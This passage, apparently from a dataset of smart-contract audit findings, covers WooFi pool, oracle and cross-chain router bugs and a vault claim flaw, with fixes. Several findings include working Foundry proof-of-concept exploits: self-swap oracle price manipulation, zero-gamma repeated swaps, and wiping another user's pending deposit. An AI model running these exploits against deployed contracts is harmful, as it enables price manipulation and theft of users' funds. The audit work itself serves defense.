_decodePrice(uint32(bytes4(_input[5 // Add the line below\\n i * 5 // Add the line below\\n 1:5 // Add the line below\\n i * 5 // Add the line below\\n 5])));\\n infos[base].price = p;\\n }\\n\\n// Remove the line below\\n timestamp = (op == 0) ? block.timestamp : uint256(uint32(bytes4(_input[1 // Add the line below\\n len * 5:1 // Add the line below\\n len * 5 // Add the line below\\n 4])));\\n// Add the line below\\n timestamp = (op == 0) ? block.timestamp : uint256(uint32(bytes4(_input[5 // Add the line below\\n len * 5:5 // Add the line below\\n len * 5 // Add the line below\\n 4])));\\n } else if (op == 1 || op == 3) {\\n // post states list\\n address base;\\n@@ // Remove the line below\\n442,14 // Add the line below\\n443,14 @@ contract WooracleV2_2 is Ownable, IWooracleV2 {\\n uint64 k;\\n\\n for (uint256 i = 0; i < len; // Add the line below\\n// Add the line below\\ni) {\\n// Remove the line below\\n base = getBase(uint8(bytes1(_input[1 // Add the line below\\n i * 9:1 // Add the line below\\n i * 9 // Add the line below\\n 1])));\\n// Remove the line below\\n p = _decodePrice(uint32(bytes4(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 1:1 // Add the line below\\n i * 9 // Add the line below\\n 5])));\\n// Remove the line below\\n s = _decodeKS(uint16(bytes2(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 5:1 // Add the line below\\n i * 9 // Add the line below\\n 7])));\\n// Remove the line below\\n k = _decodeKS(uint16(bytes2(_input[1 // Add the line below\\n i * 9 // Add the line below\\n 7:1 // Add the line below\\n i * 9 // Add the line below\\n 9])));\\n// Add the line below\\n base = getBase(uint8(bytes1(_input[5 // Add the line below\\n i * 9:5 // Add the line below\\n i * 9 // Add the line below\\n 1])));\\n// Add the line below\\n p = _decodePrice(uint32(bytes4(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 1:5 // Add the line below\\n i * 9 // Add the line below\\n 5])));\\n// Add the line 
below\\n s = _decodeKS(uint16(bytes2(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 5:5 // Add the line below\\n i * 9 // Add the line below\\n 7])));\\n// Add the line below\\n k = _decodeKS(uint16(bytes2(_input[5 // Add the line below\\n i * 9 // Add the line below\\n 7:5 // Add the line below\\n i * 9 // Add the line below\\n 9])));\\n _setState(base, p, s, k);\\n }\\n\\n// Remove the line below\\n timestamp = (op == 1) ? block.timestamp : uint256(uint32(bytes4(_input[1 // Add the line below\\n len * 9:1 // Add the line below\\n len * 9 // Add the line below\\n 4])));\\n// Add the line below\\n timestamp = (op == 1) ? block.timestamp : uint256(uint32(bytes4(_input[5 // Add the line below\\n len * 9:5 // Add the line below\\n len * 9 // Add the line below\\n 4])));\\n } else {\\n revert(""WooracleV2_2: !op"");\\n }\\n```\\n","This bug would result in unintended exceptions and potential damages such as:\\nCollision with normal price post functions might cause users' trades executed on incorrect price and suffer losses.\\nCollision with any view function might cause price post to fail silently and hold on trade processing until next submission, and users' trades might be executed on a delayed inexact price.\\nCollision with `setStaleDuration()` might cause price freshness check to break down.",```\\nfallback () external [payable];\\nfallback (bytes calldata _input) external [payable] returns (bytes memory _output);\\n```\\n +Price manipulation by swapping any ````baseToken```` with itself,medium,"`WooPPV2.swap()` doesn't forbid the case that `fromToken == toToken == baseToken`, attackers can make any baseToken's price unboundedly drifting away by swapping with self.\\nThe issue arises due to incorrect logic in WooPPV2._swapBaseToBase():\\nFirstly, we can see the situation that `fromToken == toToken == baseToken` can pass the checks on L521~L522.\\nbaseToken's state & price is cached in memory on L527~L528, and updated first time on L541, but the 
price calculation on L555 still uses the cached state, and the `newBase2Price` is set to `wooracle` on L556 as the final price after the swap.\\nAs a result, swapping `baseToken` with itself will cause a net price drift rather than keeping price unchanged.\\n```\\nFile: contracts\\WooPPV2.sol\\n function _swapBaseToBase(\\n// rest of code\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, ""WooPPV2: !baseToken1"");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, ""WooPPV2: !baseToken2"");\\n// rest of code\\n IWooracleV2.State memory state1 = IWooracleV2(wooracle).state(baseToken1);\\n IWooracleV2.State memory state2 = IWooracleV2(wooracle).state(baseToken2);\\n// rest of code\\n uint256 newBase1Price;\\n (quoteAmount, newBase1Price) = _calcQuoteAmountSellBase(baseToken1, base1Amount, state1);\\n IWooracleV2(wooracle).postPrice(baseToken1, uint128(newBase1Price));\\n// rest of code\\n uint256 newBase2Price;\\n (base2Amount, newBase2Price) = _calcBaseAmountSellQuote(baseToken2, quoteAmount, state2);\\n IWooracleV2(wooracle).postPrice(baseToken2, uint128(newBase2Price));\\n// rest of code\\n }\\n```\\n\\nThe following coded PoC intuitively shows the problem with a specific case:\\n```\\n// SPDX-License-Identifier: MIT\\npragma solidity ^0.8.0;\\n\\nimport {Test} from ""../../lib/forge-std/src/Test.sol"";\\nimport {console2} from ""../../lib/forge-std/src/console2.sol"";\\nimport {WooracleV2_2} from ""../../contracts/wooracle/WooracleV2_2.sol"";\\nimport {WooPPV2} from ""../../contracts/WooPPV2.sol"";\\nimport {TestERC20Token} from ""../../contracts/test/TestERC20Token.sol"";\\nimport {TestUsdtToken} from ""../../contracts/test/TestUsdtToken.sol"";\\n\\ncontract TestWbctToken is TestERC20Token {\\n function decimals() public view virtual override returns (uint8) {\\n return 8;\\n }\\n}\\n\\ncontract PriceManipulationAttackTest is Test {\\n WooracleV2_2 oracle;\\n 
WooPPV2 pool;\\n TestUsdtToken usdt;\\n TestWbctToken wbtc;\\n address evil = address(0xbad);\\n\\n function setUp() public {\\n usdt = new TestUsdtToken();\\n wbtc = new TestWbctToken();\\n oracle = new WooracleV2_2();\\n pool = new WooPPV2(address(usdt));\\n\\n // parameters reference: Integration_WooPP_Fee_Rebate_Vault.test.ts\\n pool.setMaxGamma(address(wbtc), 0.1e18);\\n pool.setMaxNotionalSwap(address(wbtc), 5_000_000e6);\\n pool.setFeeRate(address(wbtc), 25);\\n oracle.postState({_base: address(wbtc), _price: 50_000e8, _spread: 0.001e18, _coeff: 0.000000001e18});\\n oracle.setWooPP(address(pool));\\n oracle.setAdmin(address(pool), true);\\n pool.setWooracle(address(oracle));\\n\\n // add some initial liquidity\\n usdt.mint(address(this), 10_000_000e6);\\n usdt.approve(address(pool), type(uint256).max);\\n pool.depositAll(address(usdt));\\n\\n wbtc.mint(address(this), 100e8);\\n wbtc.approve(address(pool), type(uint256).max);\\n pool.depositAll(address(wbtc));\\n }\\n\\n function testMaxPriceDriftInNormalCase() public {\\n (uint256 initPrice, bool feasible) = oracle.price(address(wbtc));\\n assertTrue(feasible);\\n assertEq(initPrice, 50_000e8);\\n\\n // buy almost all wbtc in pool\\n usdt.mint(address(this), 5_000_000e6);\\n usdt.transfer(address(pool), 5_000_000e6);\\n pool.swap({\\n fromToken: address(usdt),\\n toToken: address(wbtc),\\n fromAmount: 5_000_000e6,\\n minToAmount: 0,\\n to: address(this),\\n rebateTo: address(this)\\n });\\n\\n (uint256 pastPrice, bool feasible2) = oracle.price(address(wbtc));\\n assertTrue(feasible2);\\n uint256 drift = ((pastPrice - initPrice) * 1e5) / initPrice;\\n assertEq(drift, 502); // 0.502%\\n console2.log(""Max price drift in normal case: "", _toPercentString(drift));\\n }\\n\\n function testUnboundPriceDriftInAttackCase() public {\\n (uint256 initPrice, bool feasible) = oracle.price(address(wbtc));\\n assertTrue(feasible);\\n assertEq(initPrice, 50_000e8);\\n\\n // top up the evil, in real case, the fund could be 
from a flashloan\\n wbtc.mint(evil, 100e8);\\n\\n for (uint256 i; i < 10; ++i) {\\n vm.startPrank(evil);\\n uint256 balance = wbtc.balanceOf(evil);\\n wbtc.transfer(address(pool), balance);\\n pool.swap({\\n fromToken: address(wbtc),\\n toToken: address(wbtc),\\n fromAmount: balance,\\n minToAmount: 0,\\n to: evil,\\n rebateTo: evil\\n });\\n (uint256 pastPrice, bool feasible2) = oracle.price(address(wbtc));\\n assertTrue(feasible2);\\n uint256 drift = ((pastPrice - initPrice) * 1e5) / initPrice;\\n console2.log(""Unbound price drift in attack case: "", _toPercentString(drift)); \\n vm.stopPrank();\\n }\\n }\\n\\n function _toPercentString(uint256 drift) internal pure returns (string memory result) {\\n uint256 d_3 = drift % 10;\\n uint256 d_2 = (drift / 10) % 10;\\n uint256 d_1 = (drift / 100) % 10;\\n uint256 d0 = (drift / 1000) % 10;\\n result = string.concat(_toString(d0), ""."", _toString(d_1), _toString(d_2), _toString(d_3), ""%"");\\n uint256 d = drift / 10000;\\n while (d > 0) {\\n result = string.concat(_toString(d % 10), result);\\n d = d / 10;\\n }\\n }\\n\\n function _toString(uint256 digital) internal pure returns (string memory str) {\\n str = new string(1);\\n bytes16 symbols = ""0123456789abcdef"";\\n assembly {\\n mstore8(add(str, 32), byte(digital, symbols))\\n }\\n }\\n}\\n```\\n\\nAnd the logs:\\n```\\n2024-03-woofi-swap\\WooPoolV2> forge test --match-contract PriceManipulationAttackTest -vv\\n[⠆] Compiling// rest of codeNo files changed, compilation skipped\\n[⠰] Compiling// rest of code\\n\\nRunning 2 tests for test/foundry/PriceManipulationAttack.t.sol:PriceManipulationAttackTest\\n[PASS] testMaxPriceDriftInNormalCase() (gas: 158149)\\nLogs:\\n Max price drift in normal case: 0.502%\\n\\n[PASS] testUnboundPriceDriftInAttackCase() (gas: 648243)\\nLogs:\\n Unbound price drift in attack case: 0.499%\\n Unbound price drift in attack case: 0.998%\\n Unbound price drift in attack case: 1.496%\\n Unbound price drift in attack case: 1.994%\\n Unbound 
price drift in attack case: 2.491%\\n Unbound price drift in attack case: 2.988%\\n Unbound price drift in attack case: 3.483%\\n Unbound price drift in attack case: 3.978%\\n Unbound price drift in attack case: 4.473%\\n Unbound price drift in attack case: 4.967%\\n\\nTest result: ok. 2 passed; 0 failed; 0 skipped; finished in 6.59ms\\n\\nRan 1 test suites: 2 tests passed, 0 failed, 0 skipped (2 total tests)\\n```\\n","```\\n2024-03-woofi-swap\\WooPoolV2> git diff\\ndiff --git a/WooPoolV2/contracts/WooPPV2.sol b/WooPoolV2/contracts/WooPPV2.sol\\nindex e7a6ae8..9440089 100644\\n--- a/WooPoolV2/contracts/WooPPV2.sol\\n// Add the line below\\n// Add the line below\\n// Add the line below\\n b/WooPoolV2/contracts/WooPPV2.sol\\n@@ -520,6 // Add the line below\\n520,7 @@ contract WooPPV2 is Ownable, ReentrancyGuard, Pausable, IWooPPV2 {\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, ""WooPPV2: !baseToken1"");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, ""WooPPV2: !baseToken2"");\\n// Add the line below\\n require(baseToken1 != baseToken2, ""WooPPV2: baseToken1 == baseToken2"");\\n require(to != address(0), ""WooPPV2: !to"");\\n\\n require(balance(baseToken1) - tokenInfos[baseToken1].reserve >= base1Amount, ""WooPPV2: !BASE1_BALANCE"");\\n```\\n",,"```\\nFile: contracts\\WooPPV2.sol\\n function _swapBaseToBase(\\n// rest of code\\n ) private nonReentrant whenNotPaused returns (uint256 base2Amount) {\\n require(baseToken1 != address(0) && baseToken1 != quoteToken, ""WooPPV2: !baseToken1"");\\n require(baseToken2 != address(0) && baseToken2 != quoteToken, ""WooPPV2: !baseToken2"");\\n// rest of code\\n IWooracleV2.State memory state1 = IWooracleV2(wooracle).state(baseToken1);\\n IWooracleV2.State memory state2 = IWooracleV2(wooracle).state(baseToken2);\\n// rest of code\\n uint256 newBase1Price;\\n (quoteAmount, newBase1Price) = 
_calcQuoteAmountSellBase(baseToken1, base1Amount, state1);\\n IWooracleV2(wooracle).postPrice(baseToken1, uint128(newBase1Price));\\n// rest of code\\n uint256 newBase2Price;\\n (base2Amount, newBase2Price) = _calcBaseAmountSellQuote(baseToken2, quoteAmount, state2);\\n IWooracleV2(wooracle).postPrice(baseToken2, uint128(newBase2Price));\\n// rest of code\\n }\\n```\\n" +WooFi oracle can fail to validate its price with Chainlink price feed,medium,"The price precision that the WooOracle uses is 8. However, if the quote token is an expensive token or the base token is a very cheap token, then the price will be too less in decimals and even ""0"" in some cases. This will lead to inefficient trades or inability to compare the woofi price with chainlink price due to chainlink price return with ""0"" value.\\nFirst, let's see how the chainlink price is calculated:\\n```\\nfunction _cloPriceInQuote(address _fromToken, address _toToken)\\n internal\\n view\\n returns (uint256 refPrice, uint256 refTimestamp)\\n {\\n address baseOracle = clOracles[_fromToken].oracle;\\n if (baseOracle == address(0)) {\\n return (0, 0);\\n }\\n address quoteOracle = clOracles[_toToken].oracle;\\n uint8 quoteDecimal = clOracles[_toToken].decimal;\\n\\n (, int256 rawBaseRefPrice, , uint256 baseUpdatedAt, ) = AggregatorV3Interface(baseOracle).latestRoundData();\\n (, int256 rawQuoteRefPrice, , uint256 quoteUpdatedAt, ) = AggregatorV3Interface(quoteOracle).latestRoundData();\\n uint256 baseRefPrice = uint256(rawBaseRefPrice);\\n uint256 quoteRefPrice = uint256(rawQuoteRefPrice);\\n\\n // NOTE: Assume wooracle token decimal is same as chainlink token decimal.\\n uint256 ceoff = uint256(10)**quoteDecimal;\\n refPrice = (baseRefPrice * ceoff) / quoteRefPrice;\\n refTimestamp = baseUpdatedAt >= quoteUpdatedAt ? quoteUpdatedAt : baseUpdatedAt;\\n }\\n```\\n\\nNow, let's assume the quote token is WBTC price of 60,000$ and the baseToken is tokenX that has the price of 0.0001$. 
When the final price is calculated atrefPrice because of the divisions in solidity, the result will be ""0"" as follows: 60_000 * 1e8 * 1e8 / 0.0001 * 1e8 = 0\\nso the return amount will be ""0"".\\nWhen the derived chainlink price is compared with woofi oracle if the chainlink price is ""0"" then the `woPriceInBound` will be set to ""true"" assuming the chainlink price is not set. However, in our case that's not the case, the price returnt ""0"" because of divisions:\\n```\\n-> bool woPriceInBound = cloPrice_ == 0 ||\\n ((cloPrice_ * (1e18 - bound)) / 1e18 <= woPrice_ && woPrice_ <= (cloPrice_ * (1e18 + bound)) / 1e18);\\n\\n if (woFeasible) {\\n priceOut = woPrice_;\\n feasible = woPriceInBound;\\n }\\n```\\n\\nIn such scenario, the chainlink comparison between woofi and chainlink price will not give correct results. The oracle will not be able to detect whether the chainlink price is in ""bound"" with the woofi's returnt price.\\nThis also applies if a baseToken price crushes. If the token price gets very less due to market, regardless of the quoteToken being WBTC or USDC the above scenario can happen.","Precision of ""8"" is not enough on most of the cases. 
I'd suggest return the oracle price in ""18"" decimals to get more room on rounding.",Oracle will fail to do a validation of its price with the chainlink price.,"```\\nfunction _cloPriceInQuote(address _fromToken, address _toToken)\\n internal\\n view\\n returns (uint256 refPrice, uint256 refTimestamp)\\n {\\n address baseOracle = clOracles[_fromToken].oracle;\\n if (baseOracle == address(0)) {\\n return (0, 0);\\n }\\n address quoteOracle = clOracles[_toToken].oracle;\\n uint8 quoteDecimal = clOracles[_toToken].decimal;\\n\\n (, int256 rawBaseRefPrice, , uint256 baseUpdatedAt, ) = AggregatorV3Interface(baseOracle).latestRoundData();\\n (, int256 rawQuoteRefPrice, , uint256 quoteUpdatedAt, ) = AggregatorV3Interface(quoteOracle).latestRoundData();\\n uint256 baseRefPrice = uint256(rawBaseRefPrice);\\n uint256 quoteRefPrice = uint256(rawQuoteRefPrice);\\n\\n // NOTE: Assume wooracle token decimal is same as chainlink token decimal.\\n uint256 ceoff = uint256(10)**quoteDecimal;\\n refPrice = (baseRefPrice * ceoff) / quoteRefPrice;\\n refTimestamp = baseUpdatedAt >= quoteUpdatedAt ? quoteUpdatedAt : baseUpdatedAt;\\n }\\n```\\n" +Swaps can happen without changing the price for the next trade due to gamma = 0,medium,"When a swap happens in WoofiPool the price is updated accordingly respect to such value ""gamma"". 
However, there are some cases where the swap results to a ""gamma"" value of ""0"" which will not change the new price for the next trade.\\nThis is how the quote token received and new price is calculated when given amount of base tokens are sold to the pool:\\n```\\nfunction _calcQuoteAmountSellBase(\\n address baseToken,\\n uint256 baseAmount,\\n IWooracleV2.State memory state\\n ) private view returns (uint256 quoteAmount, uint256 newPrice) {\\n require(state.woFeasible, ""WooPPV2: !ORACLE_FEASIBLE"");\\n\\n DecimalInfo memory decs = decimalInfo(baseToken);\\n\\n // gamma = k * price * base_amount; and decimal 18\\n uint256 gamma;\\n {\\n uint256 notionalSwap = (baseAmount * state.price * decs.quoteDec) / decs.baseDec / decs.priceDec;\\n require(notionalSwap <= tokenInfos[baseToken].maxNotionalSwap, ""WooPPV2: !maxNotionalValue"");\\n\\n gamma = (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec;\\n require(gamma <= tokenInfos[baseToken].maxGamma, ""WooPPV2: !gamma"");\\n\\n // Formula: quoteAmount = baseAmount * oracle.price * (1 - oracle.k * baseAmount * oracle.price - oracle.spread)\\n quoteAmount =\\n (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) *\\n (uint256(1e18) - gamma - state.spread)) /\\n 1e18 /\\n decs.baseDec;\\n }\\n\\n // newPrice = oracle.price * (1 - k * oracle.price * baseAmount)\\n newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18;\\n }\\n```\\n\\nNow, let's assume: DAI is quoteToken, 18 decimals tokenX is baseToken which has a price of 0.01 DAI, 18 decimals coefficient = 0.000000001 * 1e18 spread = 0.001 * 1e18 baseAmount (amount of tokenX are sold) = 1e10;\\nfirst calculate the gamma: (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec; = 1e10 * 0.01 * 1e8 * 0.000000001 * 1e18 / 1e8 / 1e18 = 0 due to round down\\nlet's calculate the `quoteAmount` will be received: `quoteAmount` = (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) * (uint256(1e18) - gamma - 
state.spread)) / 1e18 / decs.baseDec; (1e10 * 0.01 * 1e8 * 1e18 / 1e8) * (1e18 - 0 - 0.01 * 1e18) / 1e18 / 1e18 = 99900000 which is not ""0"".\\nlet's calculate the new price: newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18; = (1e18 - 0) * 0.01 * 1e8 / 1e18 = 0.01 * 1e8 which is the same price, no price changes!\\nThat would also means if the ""gamma"" is ""0"", then this is the best possible swap outcome. If a user does this in a for loop multiple times in a cheap network, user can trade significant amount of tokens without changing the price.\\nCoded PoC (values are the same as in the above textual scenario):\\n```\\nfunction test_SwapsHappenPriceIsNotUpdatedDueToRoundDown() public {\\n // USDC --> DAI address, mind the naming..\\n uint usdcAmount = 1_000_000 * 1e18;\\n uint wooAmount = 100_000 * 1e18;\\n uint wethAmount = 1_000 * 1e18;\\n deal(USDC, ADMIN, usdcAmount);\\n deal(WOO, ADMIN, wooAmount);\\n deal(WETH, ADMIN, wethAmount);\\n\\n vm.startPrank(ADMIN);\\n IERC20(USDC).approve(address(pool), type(uint256).max);\\n IERC20(WOO).approve(address(pool), type(uint256).max);\\n IERC20(WETH).approve(address(pool), type(uint256).max);\\n pool.depositAll(USDC);\\n pool.depositAll(WOO);\\n pool.depositAll(WETH);\\n vm.stopPrank();\\n\\n uint wooAmountForTapir = 1e10 * 1000;\\n vm.startPrank(TAPIR);\\n deal(WOO, TAPIR, wooAmountForTapir);\\n IERC20(USDC).approve(address(router), type(uint256).max);\\n IERC20(WOO).approve(address(router), type(uint256).max);\\n IERC20(WETH).approve(address(router), type(uint256).max);\\n vm.stopPrank();\\n\\n // WHERE THE MAGIC HAPPENS\\n (uint128 price, ) = oracle.woPrice(WOO);\\n console.log(""price"", price);\\n \\n uint cumulative;\\n for (uint i = 0; i < 1000; ++i) {\\n vm.prank(TAPIR);\\n cumulative += router.swap(WOO, USDC, wooAmountForTapir / 1000, 0, payable(TAPIR), TAPIR);\\n }\\n\\n (uint128 newPrice, ) = oracle.woPrice(WOO);\\n console.log(""price"", price);\\n\\n // price hasnt changed although there are 
significant amount of tokens are being traded by TAPIR\\n assertEq(newPrice, price);\\n }\\n```\\n","if the ""gamma"" is ""0"", then revert.","As by design, the price should change after every trade irrelevant of the amount that is being traded. Also, in a cheap network the attack can be quite realistic. Hence, I'll label this as medium.","```\\nfunction _calcQuoteAmountSellBase(\\n address baseToken,\\n uint256 baseAmount,\\n IWooracleV2.State memory state\\n ) private view returns (uint256 quoteAmount, uint256 newPrice) {\\n require(state.woFeasible, ""WooPPV2: !ORACLE_FEASIBLE"");\\n\\n DecimalInfo memory decs = decimalInfo(baseToken);\\n\\n // gamma = k * price * base_amount; and decimal 18\\n uint256 gamma;\\n {\\n uint256 notionalSwap = (baseAmount * state.price * decs.quoteDec) / decs.baseDec / decs.priceDec;\\n require(notionalSwap <= tokenInfos[baseToken].maxNotionalSwap, ""WooPPV2: !maxNotionalValue"");\\n\\n gamma = (baseAmount * state.price * state.coeff) / decs.priceDec / decs.baseDec;\\n require(gamma <= tokenInfos[baseToken].maxGamma, ""WooPPV2: !gamma"");\\n\\n // Formula: quoteAmount = baseAmount * oracle.price * (1 - oracle.k * baseAmount * oracle.price - oracle.spread)\\n quoteAmount =\\n (((baseAmount * state.price * decs.quoteDec) / decs.priceDec) *\\n (uint256(1e18) - gamma - state.spread)) /\\n 1e18 /\\n decs.baseDec;\\n }\\n\\n // newPrice = oracle.price * (1 - k * oracle.price * baseAmount)\\n newPrice = ((uint256(1e18) - gamma) * state.price) / 1e18;\\n }\\n```\\n" +"In the function _handleERC20Received, the fee was incorrectly charged",medium,"In the function _handleERC20Received, the fee was incorrectly charged.\\nIn the contract, when external swap occurs, a portion of the fee will be charged. 
However, in function _handleERC20Received, the fee is also charged in internal swap.\\n```\\n} else {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n bridgedAmount -= fee; // @@audit: fee should not be applied to internal swap \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n if (dst1inch.swapRouter != address(0)) {\\n try\\n wooRouter.externalSwap(\\n```\\n\\nAt the same time, when the internal swap fails, this part of the fee will not be returned to the user.","Apply fee calculation only to external swaps.\\n```\\nfunction _handleERC20Received(\\n uint256 refId,\\n address to,\\n address toToken,\\n address bridgedToken,\\n uint256 bridgedAmount,\\n uint256 minToAmount,\\n Dst1inch memory dst1inch\\n) internal {\\n address msgSender = _msgSender();\\n\\n // // rest of code\\n\\n } else {\\n if (dst1inch.swapRouter != address(0)) {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n bridgedAmount -= fee; \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n try\\n wooRouter.externalSwap(\\n // // rest of code\\n )\\n returns (uint256 realToAmount) {\\n emit WooCrossSwapOnDstChain(\\n // // rest of code\\n );\\n } catch {\\n bridgedAmount += fee;\\n TransferHelper.safeTransfer(bridgedToken, to, bridgedAmount);\\n emit WooCrossSwapOnDstChain(\\n // // rest of code\\n );\\n }\\n } else {\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n try wooRouter.swap(bridgedToken, toToken, bridgedAmount, minToAmount, payable(to), to) returns (\\n uint256 realToAmount\\n ) {\\n // // rest of code\\n } catch {\\n // // rest of code\\n }\\n }\\n }\\n}\\n```\\n","Internal swaps are incorrectly charged, and fees are not refunded when internal swap fail.","```\\n} else {\\n // Deduct the external swap fee\\n uint256 fee = (bridgedAmount * dstExternalFeeRate) / FEE_BASE;\\n 
bridgedAmount -= fee; // @@audit: fee should not be applied to internal swap \\n\\n TransferHelper.safeApprove(bridgedToken, address(wooRouter), bridgedAmount);\\n if (dst1inch.swapRouter != address(0)) {\\n try\\n wooRouter.externalSwap(\\n```\\n" +Claim functions don't validate if the epoch is settled,high,"Both claim functions fail to validate if the epoch for the request has been already settled, leading to loss of funds when claiming requests for the current epoch. The issue is worsened as `claimAndRequestDeposit()` can be used to claim a deposit on behalf of any account, allowing an attacker to wipe other's requests.\\nWhen the vault is closed, users can request a deposit, transfer assets and later claim shares, or request a redemption, transfer shares and later redeem assets. Both of these processes store the assets or shares, and later convert these when the epoch is settled. For deposits, the core of the implementation is given by _claimDeposit():\\n```\\nfunction _claimDeposit(\\n address owner,\\n address receiver\\n)\\n internal\\n returns (uint256 shares)\\n{\\n shares = previewClaimDeposit(owner);\\n\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimDeposit(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n return _convertToShares(assets, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToShares(\\n uint256 assets,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets =\\n 
epochs[requestId].totalAssetsSnapshotForDeposit + 1;\\n uint256 totalSupply =\\n epochs[requestId].totalSupplySnapshotForDeposit + 1;\\n\\n return assets.mulDiv(totalSupply, totalAssets, rounding);\\n}\\n```\\n\\nAnd for redemptions in _claimRedeem():\\n```\\nfunction _claimRedeem(\\n address owner,\\n address receiver\\n)\\n internal\\n whenNotPaused\\n returns (uint256 assets)\\n{\\n assets = previewClaimRedeem(owner);\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n epochs[lastRequestId].redeemRequestBalance[owner] = 0;\\n _asset.safeTransferFrom(address(claimableSilo), address(this), assets);\\n _asset.transfer(receiver, assets);\\n emit ClaimRedeem(lastRequestId, owner, receiver, assets, shares);\\n}\\n\\nfunction previewClaimRedeem(address owner) public view returns (uint256) {\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n uint256 shares = epochs[lastRequestId].redeemRequestBalance[owner];\\n return _convertToAssets(shares, lastRequestId, Math.Rounding.Floor);\\n}\\n\\nfunction _convertToAssets(\\n uint256 shares,\\n uint256 requestId,\\n Math.Rounding rounding\\n)\\n internal\\n view\\n returns (uint256)\\n{\\n if (isCurrentEpoch(requestId)) {\\n return 0;\\n }\\n uint256 totalAssets = epochs[requestId].totalAssetsSnapshotForRedeem + 1;\\n uint256 totalSupply = epochs[requestId].totalSupplySnapshotForRedeem + 1;\\n\\n return shares.mulDiv(totalAssets, totalSupply, rounding);\\n}\\n```\\n\\nNote that in both cases the ""preview"" functions are used to convert and calculate the amounts owed to the user: `_convertToShares()` and `_convertToAssets()` use the settled values stored in `epochs[requestId]` to convert between assets and shares.\\nHowever, there is no validation to check if the claiming is done for the current unsettled epoch. 
If a user claims a deposit or redemption during the same epoch it has been requested, the values stored in `epochs[epochId]` will be uninitialized, which means that `_convertToShares()` and `_convertToAssets()` will use zero values leading to zero results too. The claiming process will succeed, but since the converted amounts are zero, the users will always get zero assets or shares.\\nThis is even worsened by the fact that `claimAndRequestDeposit()` can be used to claim a deposit on behalf of any `account`. An attacker can wipe any requested deposit from an arbitrary `account` by simply calling `claimAndRequestDeposit(0, `account`, """")`. This will internally execute `_claimDeposit(account, account)`, which will trigger the described issue.\\nThe following proof of concept demonstrates the scenario in which a user claims their own deposit during the current epoch:\\n```\\nfunction test_ClaimSameEpochLossOfFunds_Scenario_A() public {\\n asset.mint(alice, 1_000e18);\\n\\n vm.prank(alice);\\n vault.deposit(500e18, alice);\\n\\n // vault is closed\\n vm.prank(owner);\\n vault.close();\\n\\n // alice requests a deposit\\n vm.prank(alice);\\n vault.requestDeposit(500e18, alice, alice, """");\\n\\n // the request is successfully created\\n assertEq(vault.pendingDepositRequest(alice), 500e18);\\n\\n // now alice claims the deposit while vault is still open\\n vm.prank(alice);\\n vault.claimDeposit(alice);\\n\\n // request is gone\\n assertEq(vault.pendingDepositRequest(alice), 0);\\n}\\n```\\n\\nThis other proof of concept illustrates the scenario in which an attacker calls `claimAndRequestDeposit()` to wipe the deposit of another account.\\n```\\nfunction test_ClaimSameEpochLossOfFunds_Scenario_B() public {\\n asset.mint(alice, 1_000e18);\\n\\n vm.prank(alice);\\n vault.deposit(500e18, alice);\\n\\n // vault is closed\\n vm.prank(owner);\\n vault.close();\\n\\n // alice requests a deposit\\n vm.prank(alice);\\n vault.requestDeposit(500e18, alice, alice, """");\\n\\n // 
the request is successfully created\\n assertEq(vault.pendingDepositRequest(alice), 500e18);\\n\\n // bob can issue a claim for alice through claimAndRequestDeposit()\\n vm.prank(bob);\\n vault.claimAndRequestDeposit(0, alice, """");\\n\\n // request is gone\\n assertEq(vault.pendingDepositRequest(alice), 0);\\n}\\n```\\n","Check that the epoch associated with the request is not the current epoch.\\n```\\n function _claimDeposit(\\n address owner,\\n address receiver\\n )\\n internal\\n returns (uint256 shares)\\n {\\n// Add the line below\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n// Add the line below\\n if (isCurrentEpoch(lastRequestId)) revert();\\n \\n shares = previewClaimDeposit(owner);\\n\\n// Remove the line below\\n uint256 lastRequestId = lastDepositRequestId[owner];\\n uint256 assets = epochs[lastRequestId].depositRequestBalance[owner];\\n epochs[lastRequestId].depositRequestBalance[owner] = 0;\\n _update(address(claimableSilo), receiver, shares);\\n emit ClaimDeposit(lastRequestId, owner, receiver, assets, shares);\\n }\\n```\\n\\n```\\n function _claimRedeem(\\n address owner,\\n address receiver\\n )\\n internal\\n whenNotPaused\\n returns (uint256 assets)\\n {\\n// Add the line below\\n uint256 lastRequestId = lastRedeemRequestId[owner];\\n// Add the line below\\n if (isCurrentEpoch(lastRequestId)) revert();\\n \\n assets = previewClaimRedeem(owner);\\n// Remove the line below\\n 